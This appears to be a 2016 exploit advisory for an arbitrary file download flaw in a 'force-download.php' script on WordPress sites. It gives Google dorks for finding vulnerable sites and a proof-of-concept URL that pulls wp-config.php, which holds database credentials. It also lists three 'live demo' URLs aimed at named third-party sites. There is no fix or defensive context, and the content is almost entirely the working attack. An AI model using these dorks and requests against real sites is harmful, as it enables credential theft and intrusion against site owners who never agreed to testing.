######################
# ____ _ ____ ____ ___ ____ _ ____ _
# __ _| __ ) / | _ / ___|_ _| _ | | |___ / |
# / / _ / _ | | | | | _ | || |_) | | __) | |
# > <| |_) / ___ | |_| | |_| || || _ <| |___ / __/| |
# /_/_____/_/ _____/ ____|___|_| ______|_____|_|
#
######################
# Exploit Title : Wordpress force download Arbitrary File Download
# Dork 1 : inurl:force-download.php?file=wp-content/uploads
# Dork 2 : inurl:wp-content/uploads inurl:force-download.php?file=
# Vendor Homepage : http://elouai.com/force-download.php
# Tested on: [ BACKBOX]
# skype:xbadgirl21
# Date: 07/08/2016
# video Proof : https://www.youtube.com/watch?v=V3o_17be8zY
######################
# PoC
######################
# [+] Using `force-download.php` file from `Wordpress websites we can download any file.
#
# [!] http://localhost/force-download.php?file=wp-config.php
#
######################
# Live Demo
######################
# [!] https://www.quantumib.com/force-download.php?file=wp-config.php
# [!] https://help.jin-soku.biz/force-download.php?file=wp-config.php
# [!] http://www.globalvoip.ca/force-download.php?file=wp-config.php
######################
# Discovered by : xBADGIRL21
# Greetz : All Mauritanien Hackers - NoWhere
######################